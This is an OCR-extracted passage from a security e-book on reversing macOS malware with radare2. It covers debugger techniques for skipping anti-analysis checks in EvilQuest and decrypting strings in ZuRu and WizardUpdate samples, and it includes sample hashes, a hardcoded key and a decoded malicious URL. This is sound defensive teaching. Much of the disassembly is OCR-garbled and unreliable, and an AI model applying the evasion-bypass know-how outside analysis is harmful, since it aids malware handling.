function. If the function doesn’t do anything that affects the state of our program later on, this can be 
a good choice. 


By the same token, if we execute the function but manipulate the value it returns, we may 
be allowing execution of code buried in that function that might trip us up. For example, 
if our function contains jumps to subroutines that do further anti-analysis tests, then we 
might get blocked before the parent function even returns, so this strategy wouldn’t help us. 
Clearly then, we need to take a look around the code to figure out which is the best strategy in each 
particular case. 


Let’s take a look inside the _is_virtual_mchn function to see what it would do and work out 
our strategy. 


If you’re still in Visual Graph mode, hit the q key to get back to the r2 prompt. Regardless of where 
you are, you can disassemble a function by combining pdf with the @ symbol and providing a flag or 


address. Remember, you can also use tab expansion to get a list of possible symbols. 


pdf @ <flag or address> 


is_executable y! debugging sym._is_virtual_mchn sym. _ 


+_is_virtual_mchn 


(int64_t argl); 
@ rb 


®x100007bc0 
®x100007bc1 
®x100007bc4 
®x100007bc8 
@x100007bca 
@x100007bcc 
®x100007bcf 
@x100007bd2 
®x100007bd7 
®x100007bdb 
®x100007bde 
@x100007be3 
@x100007be5 
®x100007be8 
®x100007bed 
®x100007bef 
0x100007bf3 
®x100007bT7 
@x100007bfb 
@x100007bfe 
0x10000 
0x10000 
®x10000 
®x100007c 
0x100007 
0x1000¢ 
®x10000 

@)> 


The 

function causes the 
malware to exit unless 
it returns ‘O’ 


The Visual Debugger 
in radare2 


It seems this function subtracts the sleep interval from the second timestamp, then compares 
it against the first timestamp. Jumping back out to how this result is consumed in ? 
it seems that if the result is not 0, the malware calls with =4. 


> 0x10000be5a ; int64_t argl 
0x10000be5f all 
0x10000be64 
@x10000be67 
@x10000be6d 
@x10000be72 
; CODE XREF from main @ @x10000be67 


@x10000be77 ord [var_30h], ® 

0x10000be7f ( [var_34h], 0 

0x10000be86 ( [var_38h], 0 

0x10000be8d , [var_30h] ; int64_t argl 
0x10000be91 , ([var_34h] ; int64_t arg2 
0x10000be95 

@x10000be9a , @ 


The function appears to be somewhat misnamed as we don’t see the kind of tests that we would 
normally expect for VM detection. In fact, it looks like an attempt to evade automated sandboxes that 
function, and we’re not likely to fall foul of it just by executing in our VM. 


However, we can also see that the next function, , also exits if it doesn’t return the 
expected value, so let’s practice both the techniques discussed above so that we can learn how to 
use the debugger with whichever one we need to use. 


Manipulating Execution with the radare2 Debugger 


If you are at the command prompt, type Vp to go into radare2 visual mode (yup, this is another mode, 
and not the last!). 


E 
(@x10c826000 [xaDvc]@ @% 150 /Users/auser/Downloads/EvilQuest/patch]> diq;?7t®;f ym, .syncsem+77879496 # @x10c826000 
stopped at @x@@e@00000 
offset @123 45 67 89 AB CD EF 6123456789ABCDEF 
Ox7ffee7e32e58 
Ox7ffee7e32e68 7f 
Ox7ffee7e32e78 
Ox7ffee7e32e88 7f . 
rax 0x00008000 rbx 0x00000000 rcx 0x00G00000 
rdx 0x00000000 rdi @x00000000 rsi x00000000 
rbp @x@0000000 rsp Ox7ffee7e32e58 r8 @x00000000 
r9 0x80008000 r1@ @x08000000 r11 @x00000000 
ri2 0x®0000000 713 @x®0000000 714 @x08000000 
r15 0x00000000 rip @x10c826000 rflags @x00000200 
$:0 2:8 ¢:8 0:8 p:® 
3-- rip: 
9x10c826001 
0x10c826003 
@x18c826006 
@x10c82600a 
x10c82600e 
@x10c826011 
@x10c826015 
@x10@c82601c 
x10c826020 
@x10c826025 
@x18c826029 
< @x10c82602d 
@x10c82602F 
x10c826032 


mainO in Visual 
Debugger mode 


We get registers at the top, and source code underneath. The current line where we’re stopped in the 
debugger is highlighted. If you don’t see that, hit uppercase S once (i.e., shift-s), which steps over one 
source line, and — in case you lose your way — also brings you back to the debugger view. 


Let’s step smartly through the source with repeated uppercase S commands (by the way, in visual 
mode, lowercase s steps in, whereas uppercase S steps over). After a dozen or so rapid step overs, 
you should find yourself inside this familiar code, which is main(). 


[@x1@7dd8d84 [xaDvc]@ @% 170 /Users/auser/Downloads/EvilQuest/patch]> diq;?t@;f .. @ main+4 # Ox107dd8d84 
step at @x1@7dd&d81 
- offset - @123 45 67 89 AB CD EF 0123456789ABCDEF 
Ox7ffee7e32e40 7f 7c ef? 7f X. : t 
Ox7ffee7e32eS0 
@x7ffee7e32e60 Nz 7 
Ox7ffee7e32e70 
rax @x107dd8d80 rbx 0x00000000 Ox7ffee7e32e80 
rdx Ox7ffee7e32e78 rdi 0x@0000001 i Ox7ffee7e32e68 
rbp Ox7ffee7e32e40 rsp Ox7ffee7e32e40 Ox00000000 
r9 @x80000000 r1@ 0x00000000 @x00000000 
r12 @x80000000 r13 0x00000000 2 @x@0000000 
riS 0x00000000 0x10 34 @x00000346 


c:8 0:0 p:1 


. rip: 
@x107dd8d8b 
@x107dd8d92 
@x107dd8d95 
@x107dd8d99 
@x107dd8da@ 
@x107dd8da7 
@x107dd8dae 
@x107dd8dbS 
@x107dd8dbc 

< Ox107dd8dcO 
@x107dd8dc6 
@x10@7dd8dca 
@x107dd8dce 
@x107dd8dd5 
@x107dd8dda 

—< @x107dd8ddd 
@x107dd8de3 

< @x107dd8dea 


Note the highlighted dword, which is holding the value of argc. It should be 2, but we can see from 
the register above that rdi is only 1. The code will jump over the next function call, which if you hit 
the 1 key on the keyboard you can inspect (hit u to come back) and see this is a string comparison. 
Let’s continue stepping over and let the jump happen, as it doesn’t appear to block us. We'll stop just 
short of the is_virtual_mchn function. 


Seek and break locations 
are two different things! 


[0x191028e5@ [xAdvc]® 0% 183 - 
—< @x101028e50 
r> @x101028e55 


eee X101028e5aq 


Qx101028e5F 
0x101028e64 

r—< 0x101028e67 
| @x101028e6d 
| Qx101028e72 
> @x101028e77 
0x101028e7f 
Qx101028e86 
@x101028e8d 
@x101028e91 
@x101028e95 
@x101028e9a 

< @x101028e9d 
@x101028ea3 
@x101028ea8 

> 0x101028ead 
@x101028ebS 


We know from our earlier discussion what’s going to happen here, so let’s see how to take each 
of our options. 


The first thing to note is that although the highlighted address is where the debugger is, that’s not 
where you are if you enter an r2 command prompt, unless it’s a debugger command. To see what 
I mean, hit the : (colon) key to enter the command line. 


From there, print out one line of disassembly with this command: 
> pd 1 


Note that the line printed out is r2’s current seek position, shown at the top of the visual view. This is 
good. It means you can move around the program, seek to other functions and run other r2 commands 
without disturbing the debugger. 


On the other hand, if you execute a debugger command on the command line it will operate on the 
source code where the debugger is currently parked, not on the current seek at the top of your view 
(unless they happen to be the same). 


OK, let’s entirely skip execution of the _is_virtual_mchn function by entering the command line 
with : and then: 


> dss 2 


Hit return twice. As you can see, the dss command skips the number of source lines specified by the 
integer you gave it, making it a very easy way to bypass unwanted code execution. 


Alternatively, if we want to execute the function then manipulate the register, stop the debugger on 
the line where the register is compared, and enter the command line again. This time, we can use dr 
to both inspect and write values to our chosen register. 


> dr eax // see eax's current value 

> dr eax = @ // set eax to 9 

drr // view all the registers 

dro // see the previous values of the registers 


Vv 


Vv 


Viewing and changing 
register values 


0x1@9bS6e9a 


< @x1@9bS6e9d 
Q@x109bS6ea3 
Q@x109bS6ea8 
“> @x109b56ead 
@x109bS6ebS 
@x109bS6eb9 ¢ r¢ 
Q@x1@9bS6ebc ea rsi, [var_4@h] 
@x109bS6ec@ Sb call sym._extract_ei 
@x1@9bS6ecS } mov qword [v 8h], 
Q@x109bS6ec9 48837¢ ’ h], @ 
< @x109bS6ece 1 je 5 
Q@x109bS6ed4 
Q@x109bS6ed8 rsi, 
Q@x109bS6edc : mov rdx, 
Q@x109bS6ee0 mn rax, ar_10 
@x109bS6ee4 mov rex, qword [rax] 
@x109bS6ee7 4 call sym._persist_executable_frombundle 


8h] 
J 
] 


:> dr eax 
0x00000000 
:> dr eax = 1 
Qx00000000 ->0x00000001 
t> dr eax 

0x00000001 


> 


And that, pretty much, is all you need to defeat anti-analysis code in terms of manipulating execution. 
Of course, the fun part is finding the code you need to manipulate, which is why we spent some time 
learning how to move around in radare2 in both visual graph mode and visual mode. Remember that 
in either mode you can get back to the regular command prompt by hitting q. As a bonus, you might 
play around with hitting p and tab when in the visual modes. 


At this point, I suggest going back to the list of functions we identified at the beginning of the chapter 
and see what they do, and whether it’s best to skip them or modify their return values (or whether 
either option will do). You might want to look up the built-in help for listing and setting breakpoints 
(from a command prompt, try db?) to move quickly through the code. By the time you’ve done this a 
few times, you'll be feeling pretty comfortable about tackling other samples in radare2’s debugger. 


Summary 


If you’re starting to see the potential power of r2, I strongly suggest you read the free online radare2 
book, which will be well worth investing the time in. By now you should be starting to get the feel of 
r2 and exploring more on your own with the help of the ? command and other resources. As we go 
into further challenges, we’ll be spending less time going over the r2 basics and digging more into the 
actual malware code. 


In the next chapter, we’re going to start looking at one of the major challenges in reversing macOS 
malware that you are bound to face on a regular basis: dealing with encrypted and obfuscated strings. 


O6 


SENTINELONE E-BOOK 


Techniques for String Decryption 
in macOS Malware with Radare2 


So far, you should have a good idea how to use radare2 to quickly triage a Mach-O binary statically 
and how to move through it dynamically to beat anti-analysis attempts. But sometimes, no matter 
how much time you spend looking at disassembly or debugging, you'll hit a roadblock trying to figure 
out your macOS malware sample’s most interesting behavior because much of the human-readable 
‘strings’ have been rendered unintelligible by encryption and/or obfuscation. 


That’s the bad news; the good news is that while encryption is most definitely hard, decryption is, 
at least in principle, somewhat easier. Whatever methods are used, at some point during execution 
the malware itself has to decrypt its code. This means that, although there are many different 
methods of encryption, most practical implementations are amenable to reverse engineering given 
the right conditions. 


Sometimes, we can do our decryption statically, perhaps emulating the malware’s decryption 
method(s) by writing our own decryption logic(s). Other times, we may have to run the malware and 
extract the strings as they are decrypted in memory. We'll take a practical look at using both of these 
techniques through a series of short case studies of real macOS malware. 


First, we'll look at an example of AES 128 symmetric encryption used in the recent macOS.ZuRu 
malware and show you how to quickly decode it; then we'll decrypt a Vigenére cipher used in the 
WizardUpdate/Silver Toucan malware; finally, we’ll see how to decode strings dynamically, in-memory 
while executing a sample of a notorious adware installer. 

Although we cannot cover all the myriad possible encryption schemes or methods you might 
encounter in the wild, these case studies should give you a solid basis from which to tackle other 
encryption challenges. We'll also point you to some further resources showcasing other macOS 


malware decryption strategies to help you expand your knowledge. 


For our case studies, you can grab a copy of the malware samples we'll be using from the following 
links (all are Mach-O file types): 


1. macOS.ZuRu - 9873cc929033a3f9a463bcbca3b65c3b031b3352 
2. WizardUpdate - 3c224d8ad6b977a1899bd3d19d034418d490f19F 
3. Adware Installer - e978fbcb9002b7dace469f00da485a8885946371 


Don’t forget to use an isolated VM for all this work: these are live malware samples and you do not 
want to infect your personal or work device. 


A SECURITY PRACTITIONER’S GUIDE TO REVERSING MACOS MALWARE WITH RADARE2 


Getting started with our 
macOS.ZuRu sample 


Breaking AES Encryption in macOS.ZuRu 


Let’s begin with a recent strain of new macOS malware dubbed ‘macOS.ZuRu’. This malware was 
distributed inside trojanized applications such as iTerm, MS Remote Desktop and others in September 
2021. Inside the malware’s application bundle is a Frameworks folder containing the malicious 
libcrypto.2.dylib. The sample we’re going to look at has the following hashes: 


md5 b5caf2728618441906a187fc6e90d6d5 
shal  9873cc929033a3f9a463bcbca3b65c3b031b3352 
sha256 8db4f17abc49da9dae124f5bf583d0645510765a6f7256d264c82c2b25becf8b 


Let’s load it into r2 in the usual way and consider the simple sequence of reversing steps illustrated 
in the following images. 


NSData_Encryption_,AESI28Decry 


inp.CCCrypt 


de [CALL] call sym.imp.CCCrypt 
St [CALL] call sym.imp.CCCrypt 


As shown in the image above, after loading the binary, we use 11 to look at the imports, and see among 
them CCCrypt (note that I piped this to head for display purposes). We then do a case insensitive 
search on ‘crypt’ in the functions list with afll~+crypt. 


If we add [@] to the end of that, it gives us just the first column of addresses. We can then do a for- 
each over those using backticks to pipe them into axt to grab the XREFS. The entire command is: 


> axt @@=‘afll~crypt[@]- 


The result, as you can see in the lower section of the image above, shows us that the malware uses 
CCCrypt to call the AESDecrypt128 block cipher algorithm. 


AES128 requires a 128-bit key, which is the equivalent of 16 bytes. Though there’s a number of ways 
that such a key could be encoded in malware, the first thing we should do is a simple check for any 16 
byte strings in the binary. 


To do that quickly, let’s pipe the binary’s strings through the awk command line tool and filter on the 
len column for ‘16’: That’s the fourth column in r2’s iz output. We'll also narrow down the output to 
just cstrings by grepping on ‘string’, so our command is: 


> iz | awk 'S$4==16' | grep string 


We can see the output in the middle section of the following image. 


Ox80G000000002ef a0 6 1 3 Oxeogge0R00002eF ad 6 OxeggggegR0002ef a6 
}> afll—tcrypt[6) 

0x0060000000002270 

6x9eG0808008003460 

0x906060000602c3e0 

8xeee0egeGeee2c608 

9x000000000002ef a0 

axt @@="afll~+crypt[6]° 
method.NSData_Encryption_.AES128EncryptWithKey: ®x2c54e [CALL] call sym.imp.CCCrypt 
method .NSData_Encryption_.AES128DecryptWithKey: @x2c75f [CALL] call sym.imp.CCCrypt 
}> iz | awk '$4==16" | grep string 
@x80032cSc OxOOO32c5c 16 .__TEXT.__objc_methname ascii stringForHeaders 
@xeGG34acd OxOeG34acd 16 -__TEXT.__estring ascii quwi38te87duy78u 
@x80034b3d Ox06034b3d 16 .__TEXT.__cstring ascii application/json 
@x00035255 8x00035255 16 -__TEXT.__cstring ascii T@"NSString",R,C 
8x00035266 0x00035266 16 .__TEXT.__cstring ascii debugDescription 
@x00635308 ©x00035308 16 .__TEXT.__cstring ascii downloadProgress 
OxO00354fc OxOe0354fc 16 «__TEXT.__cstring ascii NSURLSessionTask 
@x0003681e OxO003681e 16 .__TEXT.__estring ascii hasFinalBoundary 
@x6G8369e7 OxOGG369e7 16 TEXT estring ascii pinnedPublickeys 
@x00036e7b OxO0036e7b 16 -__TEXT.__cstring ascii reachableViaWWAN 
@xeGe836e8c OxGeG36e8c 16 -__TEXT.__estring ascii reachableViawiFi 
@x000371a7 ©x000371a7 16 .__TEXT.__cstring ascii NSConstantString 
@x00037419 8x00037419 16 -__TEXT.__cstring ascii kKCFALlocatorNull 
Ox80838e68 OxOG038e6s 16 16.__DATA.__cfstring ascii cstr.quwi38ie87duy78u 
OxOGO38TO8 OxOOO38FOS 16 16.__DATA.__cfstring ascii cstr.application/json 
@x80639608 6x60039608 16 16.__DATA.__cfstring ascii cstr.NSURLSessionTask 
0x0003a228 0x0003a228 16 16.__DATA.__cfstring ascii cstr.reachableViaWwAN 
@x6003a248 Ox80G3a248 16 16.__DATA.__ cfstring ascii cstr.reachableViawiFi 
1z~quwi38[2] 


@x@8634acd 
0x00038e68 
S axt @@="iz~quwi38[2]° 


7 H 3 (nofunc) @x34a52 [CODE] jb str.quwi38ie87duy78u 
Filtering the malware s method .NSObject_Common_.AESDecrypt: 6x348b [DATA] lea 
strings for possible 
AES 128 keys 


We got lucky! There’s two occurrences of what is obviously not a plain text string. Of course, it could 
be anything, but if we check out the XREFS we can see that this string is provided as an argument to 
the AESDecrypt method, as illustrated in the lower section of the above image. 


All that remains now is to find the strings that are being deciphered. If we get the function summary 
of AESDecrypt from the address shown in our last command, 0x348b, it reveals that the function is 


using base64 encoded strings. 


> pds @ @x348b 


[8x880800000)> pds @ Ox348b 

Q@x@000348b str.cstr.quwi38ie87duy78u 

©x9000349d call rax 

®x000034aa call sym.imp.objc_alloc 

8x800034ba call sym.imp.objc_alloc 

Oxooudi4e4 str. initWithBase64EncodedString:options: 
©x000034ed call r9 

©x000034f4 str.AES128DecryptWithKey: 

8x80003506 call rex 

8x80003508 void *instance 


®©x0000350b call sym.imp.objc_retainAutoreleasedReturnValue 
©x00003510 str. initWithData: encoding: 
6x66060352b call r9 


@x00003541 call rax 

©x0000354b call rax 

©x00003555 call rax 

8x90003557 void *instance 

0x0000355b int type 

©x00003563 call sym.imp.objc_storeStrong 
®x00003568 void *instance 

0x0000356c int type 

0x80003570 call sym.imp.objc_storeStr 
©x00003575 void *instance 

©x00003579 int type 


Grabbing a function 8x08000357d call sym.imp.objc_storeStrong 
: . Ox0000358e sym.imp.objc_autoreleaseReturnValue 
summary in r2 with [0x00000000] > 


the pds command 


A quick and dirty way to look for base64 encoded strings is to grep on the “=” sign. We'll use r2’s own 
grep function, ~ and pipe the result of that through another filter for “str” to further refine the output. 


> 1Z~=~str 


{8x@8000000)> 1z-=-str 


12 6x@0634ade 6xe8034ade 25 . -__estring OPp2nG8br701B+SwloAGBg== 
13° 6xO0834aT7 Ox8G034aT7 25 _cstring ZqbGwHYAUvkgSLZ8VpUQdg== 
14 @x06834b1e 6xe8634b16 45 __cestring Df/zZJ7A*969QZ20N8Q5F pFOZAMWGARtOfQgcoZ3f7N/8 
19 6x@8834b7d 8xO8034b7d 22 _estring S088. £8? ver=1.2&id=%e 
33 6x06634c56 8x8034c56 38 _cstring 888888888 code: exe 
35 @x80834c7c 8xO8G34c7c 36 —cstring 888888888 identifier -@%e 
36 @x80834ca2 8x60034ca2 91 —cstring /Users/erdou/Desktop/maciz A /sendRelease3 .1/crypto.2/AFNetworking 
locks=Basic Latin,CJK Unified Ideographs 
164 6x6663556d 6x6663556d 65 6.__TEXT.__cstring /Users/erdou/Desktop/maciz A /sendRelease3.1/crypto.2/AFNetworking. 
ocks*Basic Latin,CJK Unified 
177 @x@O835f15 @xeee33ST15 11 6.__TEXT. cstring 1$&"()**, 58 
178 6xOO835f21 @xeee3ST21 5 6.__TEXT. cstring sere 
186 8x6B835f7e BxeGe3Sf7e 16 6,__TEXT._estring SO; q=%8.1g 
196 @x0003602d 6x@003602d 91 6,.__ TEXT, _cstring /Users/erdou/Desktop/macit A /sendRelease3.1/crypto.2/AFNetworking 
n.m blocks=Basic Latin,CJK Unified Ideograph 
239 6x808364da 8x680364da 36 6.__TEXT.__cstring form-data; nam xe"; filename="%@" 
241 6x66636512 6x66636512 21 6.__TEXT.__cstring form-data; na xe" 
243 6x0083652c 6x8G03652c 33 6.__TEXT.__cstring multipart/form-data; boundary=%@ 
352 8xOOG36ecbd OxBGO36ecd 55 6.__ TEXT. _cstring T*{__SCNetworkReachability=},R,N,V_networkReachabi lity 
488 6x606373c8 6x888373c8 53 -__TEXT.__cstring Platform2 == PLATFORM_MACOS && “unexpected platform” 
12 6x00838ea8 6x8G038ea8 25 . —_cfstring cstr.oPp2nG8br701B+SwloAGBg= 
13 6xO0038ec8 OxOG038ec8 25 __cfstring cstr.ZqbGwMYAUvkgSLz8VpUQdg== 
14 @x00638ee8 Oxe0038ee8 4s _cfstring cstr.0f/zJ7A+969QzZ0N8q5F pFoZAhWGARtofQgcoZ3f7N/G= 
19 6x80838fa8 8xeG038Fa8 22 . -_cfstring Cstr. S@k@. 20? ver=1.2&hid=Ke 
33 6x60839148 6x68039148 38 cfstring est =888888888 code: @%@ 
35 6x66639188 6x66039188 36 fstring estr =888888888 identifier: @x@ 
177 6x€8839848 6x98039848 12 fstring cstr.1S&'()*+, 52 
178 @x€8839868 0x090039868 6 . cfstring cstr.%@"%e 
186 6x86839988 6x88039968 ll ° -_cfstring cstr.%@;qe%e.lg 
Hf = Mell 239 8xO6839C8S 6x8G039C8S 36 . -__cfstring cstr.form-data; name="%@"; filename="%e" 
A quick and dirty 241 8x8O839cc8 OxOGO39cc8 21 - ._¢fstring ¢estr.form-data; name="%e* 
. 243 6x66639d68 6x66639008 33 __cfstring cstr.multipart/form-data; boundary=%8 
grep for possible [@xeeeeeeea) > 


base64 cipher strings 


Our search returns three hits that look like good candidates, but the proof is in the pudding! What we 
have at this point is candidates for: 


1. the encryption algorithm — AES128 
2. the key — “quwi38ie87duy78u” 


3. three ciphers — “oPp2nG8br70I1B+5wLoA6Bg=-., ...” 


All we need to do now is to run our suspects through the appropriate decryption routine for that 
algorithm. There are online tools such as Cyber Chef that can do that for you, or you can find code for 
most popular algorithms for your favorite language from an online search. Here, we implemented our 
own rough-and-ready AES128 decryption algorithm in Go to test out our candidates: 


DecryptAes128Ecb(data, key [] ) {H 
cipher, _ := aes.NewCipher([] (key) ) 
decrypted : (0 , (data) ) 
size := 16] 


bs, be := @, size; bs < (data); bs, be = bs+size, be+size { 
cipher.Decrypt(decrypted[bs:be], data[bs:be] } 


»Nts/RevEng/GO (-zsh) 


bSentinelLabs$ go run aesECB.go 
Decrypting: ‘Df/zI7A+969QZ0N8q5FpFoZAhWGARtofQgcoZ3f7N/@' 
Using Key: '‘quwi38ie87duy78u' 
ClearText: ' : 
A simple AES128 ECB 'SentinelLabs$ 


decryption algorithm 
implemented in Go 


We can pipe all the candidate ciphers to file from within r2 and then use a shell one-liner ina separate 
Terminal window to run each line through our Go decryption script with the candidate key. 


(Ox88000000)]> iz~=~str:68..3 | awk ‘{print $NF} 
oPp2nG8br701B+SwloA6Bg== 

ZqbGwMYAUvkg5Lz8VpUQdg== 

Df /ZzJ7A+969QZ0N8q5FpFoZAhWGARtofQgcoZ3f7N/6= 
[@x900080000)> iz~=~str:0..3 | awk ‘{print $NF}‘ > ciphers 
[8x88800088) > 


DD GO — phils@MacBook-Pro — ..nts/RevEng/GO — -zsh — 87x24 
GO$ cat ciphers| while read line; do go run aesECB.go quwi38ie87duy78u $line; 


oPp2nG8br701B+SwLoA6Bg== https:// 

ZqbGwMYAUvkg5Lz8VpUQdg== apps 

Df /zJ7A+969QZ0N8q5FpFoZAhWGARtofQgcoZ3f7N/O= mzstatics.com/fwjNY/v.php 
GO$ 


Revealing the strings 
in clear text with our 
Go decrypter 


And with a few short commands in r2 and a bash one-liner, we’ve decrypted the strings in macOS. 
ZuRu and found a valuable IoC for detection and further investigation. 


Finding our way to the 
string encryption code 
from the function analysis 


Decoding a Vigenére Cipher 
in WizardUpdate Malware 


In our second case study, we’re going to take a look at the string encryption used in a recent sample 
of WizardUpdate malware. The sample we'll look at has the following hashes: 


md5 Oc91ddaf8173a4ddfabbd86f4e782baa 
shal 3c224d8ad6b977a1899bd3d19d034418d490f19f 
sha256 73a465170feed88048dbc0519fbd880aca6809659e011a5a171afd31fa05dc0b 


We'll follow the same procedure as last time, beginning with a case insensitive search of functions 
with “crypt” in the name, filtering the results of that down to addresses, and getting the XREFS for 
each of the addresses. This is what it looks like on our new sample: 


We can see that there are several calls from main to a decrypt function, and that function itself calls 
sym.decrypt_vigenere. 


Vigenére is a well-known cipher algorithm which we will say a bit more about shortly, but for now, 
let’s see if we can find any strings that might be either keys or ciphers. 


Since a lot of the action is happening in main, let’s do a quick pds summary on the main function. 


Using pds to get a quick 
summary of a function 


r2’s afns can help you 
isolate strings in a function 


Access to the shell in r2 
makes it easy to isolate 
the strings of interest 


[@x100005300]> pds @ main 
j-- entry@: 
$-- umain: 


;-- func. 100005300: 

j-- rip: 

@x100005312 

@x100005312 

@x100005319 

0x100005322 

@x100005322 str.Nua3 / ZqRMcjh1j8PR 
@x100005329 in 

0x100005337 inté: 

x10000533b in 

0x 10000533 f 6 

@x 100005343 sym.decrypt_std:: :basic_string_char__std: :__1::char_traits_char___std: :__1::allocator_char. 
SST GLLocator chars) 


There are at least two strings of interest. Let’s take a better look by leveraging r2’s afns command, 
which lists all strings associated with the current function. 


[0x100005300]> afn? 


| afr rename the function 

| rename the function 

| afr same as afn without arguments. show the function name in current offset 

| construct a function name for the current offset 

| list all strings associated with the current function 

| sj list all strings associated with the current function in JSON format 

[0x100005300]> afns 

@x10@005312 0x100007d@7 str.LBZEWWERBC 

@x100005322 0x100007d12 str .Nua3ZspaovcZOwL bFnm@j6CkEs9Fq9011QHqsEi Jw8a@LESP98quZ2m9 fF Imnt LFZutWX99cZZqgRMc jh1j8PR 
@x100005476 0x100007d67 str .L8GuYtgNc@KI1a6gGKmKONaOL IDHEokMAQzhFzAunJYvX00_CogKZa7gtCARA4QBFG9qi SBN1 buVGKmKONGOL IDHEokM 
Ox1600054c2 @x100007dc4 str.MAID 

Ox1@@00SS1F @x1@@007dcb str. rrQ8BEkSpywZ@6mf fDeXMNUPKPkaE SWUOGVNH j 1xn4pKxGOX9P423871pCaeQjxTAOpJpo7HxMDpnBhK 
@x1@@00SS6b @x1@0007elc str.API_URL 


That gives us a few more interesting looking candidates. Given its length and form, my suspicion at 
this point is that the “LBZEWWERBC” string is likely the key. 


We can isolate just the strings we want by successive filtering. First, we get just the rows we want: 
> afns~:1..5 

And then grab just the last column (ignoring the addresses): 

> afnse:1..5[2] 


Then using sed to remove the “str.” prefix and grep to remove the “{MAID}’ string, we end up with: 


[@x100005300]> afns~:1..5[2] | grep -v MAID | sed 's/str.//g' 
Nua3ZspaovcZ@wLbFnm@ j6CkES9 fq9011QHqsE i Jw8a@LESP98guZ2m9F Imnt LFZutWX99cZZqRMc jh1j8PR 
L8GuYtgNc@KI1a6gGKmKONaOL IDHEokMAQzhFzAunJYvX00_CogKZa7gtCARA4QBFG9qi 9BN1buVGKmKONaOL IDHEokM 


rrQ8BEkSpywZ06mf fDeXMNUPKPkaE8WU0qVNHj 1xn4pKxG@X9P423871pCaeQjxTAOpJpo7HxMDpnBhK 
(@x100005300]> 


As before, we can now pipe these out to a “ciphers” file. 


> afns~:1..5[2] | grep -v MAID | sed 's/str.//g' > ciphers 


Let’s next turn to the encryption algorithm. Vigenere has a fascinating history. Once thought to be 
unbreakable, it’s now considered highly insecure for cryptography. In fact, if you like puzzles, you can 
decrypt a Vigeneére cipher with a manual table. 


Cot 1 = key, table cell = encrypted value, row 1 = clear tent; eg. Keyed, valwA, choar = z 


a bedtetehid 


e 
c 
Blo 
Pal 
’ 
e 
wl 
' 
2 
rie 
‘ 
™ 
ry 
glo 
P 
cy 
cy 
s|s 
r 
ule 
v 
w 
x |x 
viv 
z\z 


Tabi 2 
wechlezewwenelcilezelwweme ch #ze wwe necilelz ewwele ec alze wwe nec ieee 


si sw ee OLe SP eee we ciemart ma Fur we ove zc za hme | int 


The Vigenére cipher 
was invented before 
computers and can be 
solved by hand 


|: OES zoGVtX SByb 2ZpoGVy!i FNOSGFyZHdnNcmVEYXANAVH! w2S6 6! GF SayAnLiVVSUOQvi Hsgi H6yaWS0!i CQz!iHOn 


One of the Vigenére cipher’s weaknesses is that it’s possible to discern patterns in the ciphertext that 
can reveal the length of the key. That problem can be avoided by encrypting a base64 encoding of the 
plain text rather than the plain text itself. 


Now, if we jump back into radare2, we'll see that WizardUpdate does indeed decode the output of the 
Vigenére function with a base64 decoder. 


qword [var_10h] 3 int64_t arg2 
= var_48h 3 iunt64_t argl 
488b5590 ri qword [var_7@h] ; int64_t arg3 
65 fbf FFF enere_std: :__1: :basic_string 
1::char_traits_char std:: : r decrypt_vigenere 
&, std:: sic_string<char, std:: :ichar_traits<char>, std:: : :allocator<char> 
: $e] © Loc_0x100004c80 
; CODE XREF from decrypt(std basic_stri char, std::__1::char_traits<char>, std:: 
c :tallocato har> >&) 0x1@ —Mc7b 
c645ab byte [var_SSh] = ¢ 


ts<char>, st 


488d7Sb8 rsi = var_48h ; wnt64_t arg2 
rdi = qword [var_6@h] ; int64_t argl 
sym. base64_decode_std: ] ic_string_cl 
aits<char>, 5s tallocator<char> > « 
0 Loc_@x100004c 
basic_string<char, std::_.1 ar_traits<char>, std:: 
= 004c91 
: L> byte [var_5Sh] = 1 
WizardUpdate f r = byte [var_55Sh] & 1 
malware uses base64 c< Q if (var) goto loc_@x100004cdd 


goto Loc_@x160004cca 


encoding either side of 
encrypting/decrypting 


There is one other thing we need to decipher a Vigenére cipher aside from the key and ciphertext. We 
also need the alphabet used in the table. Let’s use another r2 feature to see if it can help us find it. 
Radare2’s search function, /, has some crypto search functionality built in. Use /c? to view the help 
on this command. 


[0x100005300]>) /c? 


| /ca Search for AES keys expanded in memory 

| Find collisions (bruteforce block Length values until given checksum is found) 
| /ck Find well known constant tables from different hash and crypto algorithms 

| Search for ASN1/DER certificates 

| 


Search for ASN1/DER private keys (RSA and ECC) 
Search for GPG/PGP keys and signatures (Plaintext and binary form) 


I /cg 
[@x100005300]>(I7ER 
Searching 30 bytes in [0x100010000-0x100018000] 


hits: @ 

Searching 30 bytes in [0x10000c000-0x100010000] 
hits: @ 

Searching 3@ bytes in [0x100008000-0x10000c000] 
hits: @ 

Searching 3@ bytes in [0x100000000-0x100008000] 
hits: 1 

Searching 30 bytes in [0x100000-0x1f0000] 

hits: @ 

Search for crypto @x100007¢26 hit26_@ .pnBhK{API_URL}ABCUEFGHIOKUMNOPORSTUVWAY Za! SpqeseuvWRy20i2s456789/al locator<T>: :a. 


. . . . @x 100005300 ]> 
materials with built-in = : 


r2 commands 


The /ck search gives us a hit which looks like it could function as the Vigeneére alphabet. 


OK, it’s time to build our decoder. This time, I’m going to adapt a Python script from here, and then 
feed it our ciphers file just as before. The only differences are I’m going to hardcode the alphabet in 
the script and then run the output through base64. Let’s see how it looks. 


+ Cipl cat ciphers | while read line; do ./vigenere.py LBZEWWERBC $line; echo; done 
CtBzDWLIntRYbs1FBWLyYSpguWSOp7DHcMxUozhH17Bwiu1+86VtAyQnb31LiksVYXSG87RYAm72YSgzY72N 


A7tqCXc8by/HcWkKCSLIDMBK1y/2DmZLnMdLBi/scI/rB4KuBmVJAWLKpx/P1339vwSZh72McXY/CSLIDMBK1y/2DmZL 


Decoding the 9q34rugootLYb2QJbydVBM7L@5gJD6LT1m/3DS@vc3QGbwwG8Nt1w4 1 f1LxZcFi YPq414omwGYItT jwgl 


strings returns 
base64 as expected 


So far so good. Let’s try running those through base64 -D (decode) and see if we get our plain text. 


+ cat ciphers | while read line; do ./vigenere.py LBZEWWERBC $line; echo; done 
CtBzDW1JntRYbs1FBW1yYSpguWS0p7DHcMxUozhH1 7Bwiu1+86VtAyQnb31LiksVYXSG87RYAm72YSgzY72N 


A7tqCXc8by/HcWkKCSLIDMBK1y/2DmZLnMdLBi/scI/rB4KuBmVJAWLKpx/P1339vwSZh72McXY/CSLIDMBK1y/2DmZL 
gq34rugootLYb2QJbydVBM7L@5gID6ELT1m/3DS@vc3QGbwwG8Ntiw41fLxZcFiYPq4lL4ommGYItT jwgl 
cat ciphers | while read line; do ./vigenere.py LBZEWWERBC $line | base64 -D; echo; done 


